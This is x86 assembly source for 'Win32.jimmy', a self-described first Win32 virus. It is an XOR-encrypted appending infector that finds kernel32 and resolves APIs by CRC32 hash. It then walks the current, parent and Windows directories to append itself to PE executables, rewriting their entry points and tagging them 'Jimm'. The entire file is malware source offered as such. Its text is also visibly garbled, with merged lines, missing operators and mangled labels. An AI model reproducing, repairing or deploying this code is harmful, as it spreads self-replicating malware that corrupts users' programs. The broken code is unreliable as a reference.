Win32.jimmy.asm


Win32.jimmy by sst@hablas.com

;

Infektion BEI WIN95 / 98 / ME, WINNT4.0, WINNT2000

Variable xor encryption

Append Infector

;

; Yes, this is my first w32.virus

.586p

.MODEL FLAT

Jumps

.radix 16

EXTRN EXITPROCESS: PROC

.DATA

Data:

Filemask DB '* .exe', 0

FileHandle DD 0H

Newsize DD 0H

AlignReg1 DD 0H

Infcounter DD 0H

APICRC32 DD 0H

TRASH2 DD 0H

DirectoryBuffer DB 255D DUP (0H)

Kernelmz DD 0H

OTABLEVA DD 0H

MapHandle DD 0H

OldDirectory DB 255D DUP (0H)

K32TRYS DD 0H

Counter dw 0h

AlignReg2 DD 0H

Apinames:

DD 0FE248274H

DD 08C892DDFH

DD 0ebc6c18bh

DD 0B2DBD7DCH

DD 0613FD7BAH

DD 0AE17EBEFH

DD 096B2D96CH

DD 0AA700106H

DD 094524B42H

DD 0797B49ECH

DD 0C200BE21H

DD 068624A9DH

ATABLEVA DD 0H

Tempapisearch2 DD 0H

APIOFFSETS:

XGetWindowsDirectorya DD 0H

XcreateFilea DD 0H

XGetcurrentDirectorya DD 0H

XSetcurrentDirectorya DD 0H

XGettickCount DD 0H

Xfindfirstfilea DD 0H

XcreateFilemappinga DD 0H

XFindNextFilea DD 0H

XunmapViewoffile DD 0H

XMapViewOffile DD 0H

XFindClose DD 0H

XCloseHandle DD 0H

Tempapi DD 0H

KERNELPE DD 0H

Randval DD 0H

FindHandle DD 0H

Oldeip DD 0H

NEWEIP DD 0H

MapAddress DD 0H

Alte DD 0H

NTABLEVA DD 0H

TRASH1 DD 0H

Filetime Struc

FT_DWLOWDATETIME DD?

FT_DWHIGHDATETIME DD?

Filetime Ends

Win32_find_data label Byte

WFD_DWFILEATTRIBUTES DD?

WFD_FTCREATIONTIME FileTime?

WFD_FTLASTACCESSTIME FileTime?

WFD_FTLASTWRITETIME FILETIME?

WFD_NFILESIGH DD?

WFD_NFILESZELOW DD?

WFD_DWRESERVED0 DD?

WFD_DWRESERVED1 DD?

WFD_SZFILENAME DB 260D DUP (?)

Wfd_szalternateFileName DB 13 DUP (?)

WFD_SZALTERNATEENDING DB 03 DUP (?)

GROESE EQU (Offset Endvirus - Offset Virus)

Numberofapis EQU 12

Encrypted = (Offset endofcrypt - offset eNCGO) / 2) 1.code

Viruscode:

Virus:

Call delta

DW 15662D

DW 31058D

CodeOfcrypt dw 0h

Delta:

MOV EDX, DWORD PTR [ESP]

Inc ESP

Add ESP, 3D

Sub EDX, (Offset Delta - 6)

MOV EBP, EDX

MOV EDI, EBP

OR EDI, EDI

JZ ENCGO

Mov Edx, Encrypted

Lea ECX, [EBP ENCGO]

Encgoloop:

XOR BX, Word PTR [EBP CodeOfCrypt]

Mov Word PTR [ECX], BX

Add ECX, 2

Dec edx

JNZ Encgoloop

Encgo:

JMP kernelsearchstart

Nokernel:

MOV EBX, DWORD PTR [EBP OLDEIP]

MOV DWORD PTR [EBP RETEIP], EBX

MOV EDI, DWORD PTR [EBP ALTE]

MOV DWORD PTR [EBP RETBASE], EDI

MOV DWORD PTR [EBP TRASH2], EDI

MOV EDI, DWORD PTR [EBP ALTE]

MOV DWORD PTR [EBP RETBASE], EDI

Executehost:

CMP EBP, 0

Je firstgenhost

Mov EBX, 12345678H

Org $ -4

Reteip DD 0H

Add ebx, 12345678H

Org $ -4

RetBase DD 0H

Push EBX

RET

FIRSTGENHOST:

SUB EBX, EBX

Push EBX

Call EXITPROCESS

Infectexe:

Call getRand

MOV EBX, DWORD PTR [EBP RANDVAL]

MOV Word PTR [EBP CodeOfCrypt], BX

MOV ECX, -49695D

Add ECX, 49695D

Add ECX, DWORD PTR [EBP MAPADDRESS]

MOV EAX, [ECX 3CH]

Add Eax, ECX

Add Eax, 3ch

Mov Edx, [EAX]

Sub Eax, 3ch

MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]

MOV DWORD PTR [EBP AlignReg2], -1

And DWORD PTR [EBP AlignReg2], EDX

SBB EAX, 2D

Add ECX, GROESE

MOV DWORD PTR [EBP AlignReg1], 0

XOR DWORD PTR [EBP AlignReg1], ECX

Call align

And ECX, 0

Add ECX, DWORD PTR [EBP AlignReg1]

MOV DWORD PTR [EBP NEWSIZE], ECX

Pushhad

Call unmapfile2

Popad

MOV DWORD PTR [EBP WFD_NFILESZELOW], ECX

Call CreateMap

JC NOEXE

Push DWORD PTR [EBP MAPADDRESS]

POP ESI

MOV EDX, DWORD PTR [ESI 3CH]

Add Edx, ESI

Push Edx

POP Esimov EBX, 0

MOV BX, Word PTR [ESI 06H]

MOV ECX, 1D

SUB EBX, ECX

Imul EBX, EBX, 28H

Add EDX, 120D

Add Edx, EBX

MOV EAX, DWORD PTR [ESI 74H]

SHL EAX, 3

Add Edx, EAX

Mov Eax, DWORD PTR [ESI 28H]

MOV DWORD PTR [EBP OLDEIP], EAX

MOV ECX, DWORD PTR [ESI 34H]

Push ECX

POP DWORD PTR [EBP ALTE]

PUSH 0

POP ECX

Add ECX, [EDX 10h]

Push ECX

POP EBX

Add Edx, 14h

Add ECX, [EDX]

Sub EDX, 14H

Push ECX

Push EBX

POP EAX

Add Eax, [EDX 0CH]

MOV [ESI 28H], EAX

Mov DWORD PTR [EBP NEWEIP], EAX

Sub Eax, EAX

Add Eax, [EDX 10h]

Push EAX

Add Eax, Groese

Push EAX

POP DWORD PTR [EBP AlignReg1]

Push DWORD PTR [ESI 3CH]

POP DWORD PTR [EBP AlignReg2]

Call align

Sub Eax, EAX

Add Eax, DWORD PTR [EBP ALIGNREG1]

MOV DWORD PTR [EDX 10h], 0H

Add DWORD PTR [EDX 10H], EAX

POP EAX

Add Eax, Groese

Mov DWORD PTR [EDX 08H], 0

Add DWORD PTR [EDX 08H], EAX

MOV EAX, DWORD PTR [EDX 0CH]

Add Eax, DWORD PTR [EDX 10h]

MOV DWORD PTR [ESI 50H], ​​0H

Add DWORD PTR [ESI 50H], ​​EAX

OR DWORD PTR [EDX 24H], 0A0000020H

MOV DWORD PTR [ESI 4CH], 'Jimm'

POP EDI

Add Edi, DWORD PTR [EBP MAPADDRESS]

MOV ECX, (Offset Encgo - Offset Virus)

Lea ESI, [EBP VIRUS]

Appendloop:

REP MOVSB

Push Encrypted

POP ECX

Cryptappendloop:

Lodsw

XOR AX, Word PTR [EBP CodeOfCrypt]

Stosw

SUB ECX, 1

JNZ CryptappendLoop

MOV EDX, (-1D xor 27D)

XOR EDX, 27D

And EDX, DWORD PTR [EBP Infcounter]

SUB EDX, 1D

ROL EAX, 16D

Push Edx

POP DWORD PTR [EBP Infcounter]

CLC

RET

NOEXE:

STC

RET

Infectfile:

CMP DWORD PTR [EBP WFD_NFILESZELOW], 44000D

Jbe noinfection

CMP DWORD PTR [EBP WFD_NFILESIGHIGH], 0

JNE NOINFECTIONCALL OPENFILE

JC NOINFECTION

MOV EAX, DWORD PTR [EBP MAPADDRESS]

CMP Word PTR [EAX], 'ZM'

Je Goodfile

Push 28785d

POP ECX

CMP ECX, 28785D

JE NotaGoodFile

Goodfile:

CMP Word PTR [EAX 3CH], 0H

JNE _NOTAGOODFILE

JMP NotaGoodFile

_NOTAGOODFILE:

XOR EBX, EBX

Add ebx, [EAX 3CH]

CMP DWORD PTR [EBP WFD_NFILESZELOW], EBX

JB NotaGoodFile

Add Ebx, EAX

CMP Word PTR [EBX], 'EP'

Je goodfile2

Push 24945D

POP ECX

CMP ECX, 24945D

JE NotaGoodFile

Goodfile2:

CMP DWORD PTR [EBX 4CH], 'Jimm'

JZ NOTAGOODFILE

MOV CX, Word PTR [EBX 16h]

RCL EDX, 12D

And CX, 0F000H

CMP CX, 02000H

JE NotaGoodFile

MOV CX, Word PTR [EBX 16h]

And CX, 00002H

CMP CX, 00002H

JNE NOTAGOODFILE

Call infectexe

JC NOINFECTION

And EDX, EBX

NOTAGOODFILE:

Call unmapfile

NOINFECTION:

RET

Outbreak:

MOV ESI, DWORD PTR [EBP OLDEIP]

MOV DWORD PTR [EBP Reteip], ESI

MOV EBX, DWORD PTR [EBP ALTE]

MOV DWORD PTR [EBP RETBASE], EBX

Call InfectCurdir

MOV EAX, EBP

Add Eax, Offset Olddirectory

Push EAX

MOV EAX, (255D XOR 32D)

XOR EAX, 32D

Push EAX

Call DWORD PTR [EBP XGetcurrentDirectorya]

Lea Edx, [EBP Olddirectory]

MOV EBX, EDX

TRAVELDOWNLOOP1:

Inc EDX

CMP Byte Ptr [EDX], 0

JNE TravelDownloadNLOOP1

TRAVELDOWNLOOP2:

Add Edx, -1D

CMP BYTE PTR [EDX], '/'

JNE TravelDownNext

MOV BYTE PTR [EDX], 0

Push EBX

Call DWORD PTR [EBP XSETCURRENTDIRECTORYA]

Pushhad

Call InfectCurdir

Popad

MOV BYTE PTR [EDX], '/'

TravelDownNext:

CMP EDX, EBX

JNE TravelDownLoop2

MOV EAX, (255D 16D)

SUB EAX, 16D

Push EAX

Lea ECX, [EBP DIRECTORYBUFFER]

Push ECX

Call DWORD PTR [EBP XGetWindowsDirectorya]

XCHG ECX, EDX

Push EDXCALL DWORD PTR [EBP XSETCURRENTDIRECTOREA]

Call InfectCurdir

Lea Edx, [EBP Olddirectory]

Push Edx

Call DWORD PTR [EBP XSETCURRENTDIRECTORYA]

JMP EXECUTEHOST

Getapis:

Push Numberofapis

POP EAX

Mov ESI, 37168D

SUB ESI, 37168D

Add ESI, DWORD PTR [EBP KERNELPE]

Mov EDI, [ESI 78H]

Add Edi, [EBP KERNELMZ]

Add EDI, 28D

MOV ESI, DWORD PTR [EDI]

Add ESI, [EBP KERNELMZ]

MOV DWORD PTR [EBP ATABLEVA], ESI

Inc EDI

Add EDI, 3D

MOV ESI, DWORD PTR [EDI]

Add EDI, 4D

Add ESI, [EBP KERNELMZ]

MOV DWORD PTR [EBP NTABLEVA], ESI

MOV ESI, DWORD PTR [EDI]

Add ESI, [EBP KERNELMZ]

MOV DWORD PTR [EBP OTABLEVA], ESI

LEA ECX, [EBP APINAMES]]

MOV ESI, EBP

Add ESI, Offset Apioffsets

Getapisloop:

And Word PTR [EBP Counter], 0H

Inc ECX

Add ECX, 3D

XOR EDX, EDX

Add Edx, DWORD PTR [EBP TEMPAPI]

MOV DWORD PTR [ESI], EDX

Inc ESI

Add ESI, 3D

Dec EAX

JNZ getapisloop

JMP Outbreak

CRC32:

Pushhad

MOV EDI, -28264D

Add EDI, 28264D

Add Edi, ESI

PUSH 0

POP EBX

Add ebx, EDI

LenCrc:

SUB EBX, -1D

CMP BYTE PTR [EBX], 0

JNE Lencrc

SUB EBX, EDI

MOV ESI, EBX

Add ESI, 1D

CLD

Mov Eax, 16859d

SUB EAX, 16859D

Dec EAX

Sub eax, 0d

Mov Edx, EAX

Nextbytecrc:

MOV EBX, -6128D

Add EBX, 6128D

SUB ECX, ECX

MOV BL, BYTE PTR [EDI]

Inc EDI

XOR BL, Al

Mov Al, AH

MOV AH, DL

MOV DL, DH

MOV DH, 8

NextbitCrc:

SHR CX, 1

RCR BX, 1

JNC NOCRC

XOR BX, 08320H

XOR CX, 0EDB8H

NOCRC:

DEC DH

JNZ nextbitCrc

XOR EAX, EBX

XOR Edx, ECX

Dec ESI

Jnz nextbytecrc

Not Edx

NOT EAX

MOV EBX, EDX

ROL EBX, 16D

MOV BX, AX

MOV DWORD PTR [EBP APICRC32], EBX

Popad

RET

Searchapi1:

Pushhad

PUSH 0

POP EBX

Add EBX, DWORD PTR [EBP NTABLEVA]

And DWORD PTR [EBP TRASH1], EBXSAR EDX, 10D

SearchNextapi1:

Push EBX

MOV EAX, DWORD PTR [EBX]

Add Eax, [EBP KERNELMZ]

Push EAX

POP EBX

Push EBX

POP ESI

PUSH ESI

POP DWORD PTR [EBP TEMPAPISEARCH]

Push ECX

CLD

Call CRC32

Mov Eax, 52825D

SUB EAX, 52825D

Add Eax, DWORD PTR [EBP APICRC32]

SUB EAX, DWORD PTR [ECX]

CMP EAX, 0

Je Foundapi1

Apinotfound:

POP ECX

MOV ESI, 0

Add ESI, DWORD PTR [EBP TEMPAPISEARCH2]

POP EBX

Inc EBX

Add EBX, 3D

Add Word PTR [EBP Counter], 1H

CMP Word PTR [EBP Counter], 2002H

Je notfoundapi1

JMP SearchNextapi1

FOUNDAPI1:

Add ESP, 8D

XOR EDX, EDX

MOV DX, Word PTR [EBP Counter]

CLC

RCL EDX, 1

Add Edx, DWORD PTR [EBP OTABLEVA]

Push Edx

POP EBX

Movzx EDX, Word PTR [EBX]

CLC

RCL EDX, 2H

Add Edx, DWORD PTR [EBP ATABLEVA]

MOV EBX, DWORD PTR [EBP KERNELMZ]

Add Ebx, DWORD PTR [EDX]

MOV DWORD PTR [EBP TEMPAPI], -1

And DWORD PTR [EBP TEMPAPI], EBX

CMP Byte PTR [EBX], 0CCH

JE EXECUTEHOST

Popad

RET

Notfoundapi1:

POP ESI

Popad

JMP EXECUTEHOST

FINDNEXTFILEPROC:

Call ClearoldData

MOV EDX, EBP

Add Edx, Offset Win32_Find_Data

Push Edx

MOV EBX, DWORD PTR [EBP FINDHANDLE]

Push EBX

Call DWORD PTR [EBP XFINDNEXTFILEA]

RET

ClearoldData:

Pushhad

Push 276D

POP EAX

Lea Edx, [EBP WFD_SZFILENAME]

ClearoldData2:

MOV BYTE PTR [EDX], 0H

Dec EAX

Jnz ClearoldData2

Popad

RET

FindfirstFileProc:

Call ClearoldData

Lea Edx, [EBP WIN32_FIND_DATA]

Push Edx

Push EBX

Call DWORD PTR [EBP XFINDFIRSTFILEA]

Push EAX

POP DWORD PTR [EBP FindHandle]

RET

Align:

Pushhad

Mov EDX, 0

MOV EAX, DWORD PTR [EBP AlignReg1]

MOV ECX, DWORD PTR [EBP AlignReg2]

Div ECX

INC EAX

Mul ECX

MOV DWORD PTR [EBP AlignReg1], 0HADD DWORD PTR [EBP AlignReg1], EAX

Popad

RET

DB 'Win32.Jimmy - SST @ hablas.com', 0

OpenFile:

PUSH 0

PUSH 0

Push 3

PUSH 0

Push 1

MOV EBX, 80000000h OR 40000000H

Push EBX

Lea EBX, WFD_SZFILENAME

Add EBX, EBP

Push EBX

Sal ECX, 28D

Call DWORD PTR [EBP XCREATEFILEA]

Add Eax, 1

JZ Closed

Dec EAX

Mov DWORD PTR [EBP FILEHANDLE], EAX

CreateMap:

MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]

Push ECX

And EDX, 0

Push Edx

Add Ebx, EAX

Push ECX

Push Edx

Push 00000004H

Push Edx

Push DWORD PTR [EBP FILEHANDLE]

Call DWORD PTR [EBP XCREATEFILEMAPPINGA]

MOV DWORD PTR [EBP MAPHANDLE], -1

And DWORD PTR [EBP MAPHANDLE], EAX

POP ECX

OR EAX, EAX

JZ Closefile

PUSH 0

POP EDX

Push ECX

Push Edx

Push Edx

Push 2H

Push DWORD PTR [EBP MAPHANDLE]

Call DWORD PTR [EBP XMapViewOffile]

Test Eax, EAX

JZ unmapfile

MOV DWORD PTR [EBP MAPADDRESS], -1

And DWORD PTR [EBP MAPADDRESS], EAX

CLC

RET

Unmapfile:

Call unmapfile2

Closefile:

Push DWORD PTR [EBP FILEHANDLE]

Call [EBP XCloseHandle]

Closed:

STC

RET

Unmapfile2:

Push DWORD PTR [EBP MAPADDRESS]

Call Dword PTR [EBP XUNMAPVIEWOFFILE]

Push DWORD PTR [EBP MAPHANDLE]

Call DWORD PTR [EBP XCloseHandle]

RET

InfectCurdir:

MOV [EBP Infcounter], 2D

MOV EBX, Offset Filemask

Add EBX, EBP

Call FindfirstFileProc

INC EAX

JZ endinfectcurdir

InfectCurdirfile:

Call infectfile

SUB ECX, ECX

Add ECX, DWORD PTR [EBP Infcounter]

Inc ECX

Dec ECX

JZ endinfectcurdir

Call FindNextFileProc

CMP Eax, 0H

JNE InfectCurdirfile

EndinfectCurdir:

Push DWORD PTR [EBP FINDHANDLE]

Call DWORD PTR [EBP XFindClose]

RET

KernelSearchstart:

MOV EAX, DWORD PTR [ESP]

SHR EAX, 16D

ROL EAX, 16D

MOV DWORD PTR [EBP K32TRYS], 4H

GK1:

MOV EDX, -1D

And EDX, DWORD PTR [EBP K32TRYS]]

OR EDX, EDX

JZ Nokernel

CMP Word PTR [EAX], 'ZM'

JE CHECKPE

GK2:

MOV EBX, (65536D 32D)

SUB EBX, 32D

Sub Eax, EBX

Dec DWORD PTR [EBP K32TRYS]

JMP GK1

CHECKPE:

Mov Edx, [EAX 3CH]

XCHG EDX, EAX

Add Eax, EDX

XCHG EDX, EAX

Movzx EBX, Word PTR [EDX]

SUB EBX, 'EP'

JZ Checkdll

JMP GK2

Checkdll:

KernelFound:

MOV DWORD PTR [EBP KERNELMZ], -1

NOT ECX

And DWORD PTR [EBP KERNELMZ], EAX

MOV DWORD PTR [EBP KERNELPE], EDX

Lea Eax, [EBP Offset GetApis]

Push EAX

RET

Getrand:

Pushhad

Add Edx, DWORD PTR [EBP RANDVAL]

Call DWORD PTR [EBP XGETTICKCOUNT]

Add Edx, EAX

Mov DWORD PTR [EBP RANDVAL], 0

Add DWORD PTR [EBP RANDVAL], EDX

Popad

RET

Endofcrypt:

Endvirus:

End viruscode
